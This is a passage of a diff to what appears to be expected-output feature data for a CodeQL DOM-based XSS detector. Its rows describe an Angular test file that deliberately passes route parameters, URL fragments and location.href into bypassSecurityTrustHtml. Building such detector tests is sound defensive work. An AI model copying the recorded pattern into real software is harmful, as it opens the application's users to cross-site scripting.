snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:66 | this.ro ... hot.url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:66 | this.ro ... hot.url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:69 | this.ro ... .url[1] | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:69 | this.ro ... .url[1] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:69 | this.ro ... .url[1] | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:69 | this.ro ... .url[1] | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:69 | this.ro ... .url[1] | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:82 | this.ro ... eterMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:82 | this.ro ... eterMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:82 | this.ro ... eterMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:82 | this.ro ... eterMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:82 | this.ro ... eterMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:89 | this.ro ... .params | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:89 | this.ro ... .params | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:89 | this.ro ... .params | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:89 | this.ro ... .params | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:89 | this.ro ... .params | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:91 | this.ro ... arams.x | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:91 | this.ro ... arams.x | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:91 | this.ro ... arams.x | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12055,6 +91713,86 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:91 | this.ro ... arams.x | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:91 | this.ro ... arams.x | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:91 | this.ro ... arams.x | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:49:36:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:49:36:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:49:36:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:49:36:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:49:36:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:55:36:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:55:36:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:55:36:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:55:36:62 | snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:55:36:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:64:36:66 | url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:64:36:66 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:64:36:66 | url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:64:36:66 | url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:64:36:66 | url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:68:36:68 | 1 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:68:36:68 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:68:36:68 | 1 | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:68:36:68 | 1 | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:68:36:68 | 1 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:71:36:82 | parameterMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:71:36:82 | parameterMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:71:36:82 | parameterMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:71:36:82 | parameterMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:71:36:82 | parameterMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:84:36:89 | params | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:84:36:89 | params | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:84:36:89 | params | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:84:36:89 | params | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:84:36:89 | params | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:91:36:91 | x | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:91:36:91 | x | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:91:36:91 | x | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:91:36:91 | x | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:91:36:91 | x | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | exceptional return of this.sa ... er.url) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | exceptional return of this.sa ... er.url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | exceptional return of this.sa ... er.url) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | exceptional return of this.sa ... er.url) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | exceptional return of this.sa ... er.url) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | this.sa ... er.url) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | this.sa ... er.url) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | this.sa ... er.url) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | this.sa ... er.url) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:5:38:59 | this.sa ... er.url) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:10:38:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:10:38:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:10:38:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:10:38:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:10:38:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:20:38:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:20:38:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:20:38:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:20:38:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:20:38:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:54 | this.router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:54 | this.router | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:54 | this.router | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml 